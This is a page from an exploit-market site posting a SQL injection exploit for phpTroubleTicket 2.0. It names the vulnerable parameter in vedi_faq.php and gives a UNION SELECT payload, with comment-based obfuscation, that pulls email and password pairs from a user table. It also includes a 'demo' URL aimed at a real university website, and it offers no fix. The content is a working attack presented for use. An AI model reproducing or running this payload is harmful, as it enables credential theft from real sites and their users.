[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

phpTroubleTicket version 2.0 SQL injection vulnerability

Author
kaMtiEz
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-11138
Category
web applications
Date add
01-03-2010
Platform
unsorted
========================================================
phpTroubleTicket version 2.0 SQL injection vulnerability
========================================================

#############################################################################################################
## phptroubleticket SQL injection (id)			                                                   ##
## Author : kaMtiEz (kamzcrew@yahoo.com)								   ##
## Homepage : http://www.indonesiancoder.com    	     					    	   ##
## Date : 1 march, 2010 						                                   ##
#############################################################################################################

[ Software Information ]

[+] Vendor : http://www.phptroubleticket.org/
[+] Download : http://www.phptroubleticket.org/downloads.html
[+] version : 2.0 / lower maybe also affected
[+] Vulnerability : SQL
[+] Dork : "CiHuY"
[+] LOCATION : INDONESIA - JOGJA
#############################################################################################################

[ Vulnerable File ]

http://127.0.0.1/[kaMtiEz]/vedi_faq.php?id=[INDONESIANCODER]

[ XpL ]

/**/union/**/all/**/select/**/1,concat_ws(0x3a,email,password)kaMtiEz,3,4/**/from/**/utenti--

[ DEMO ]

http://ww2.unime.it/ingegneria/new/assistenza/vedi_faq.php?id=666/**/union/**/all/**/select/**/1,concat_ws(0x3a,email,password)kaMtiEz,3,4/**/from/**/utenti--

[ FIX ]

dunno :">




#  0day.today [2024-11-15]  #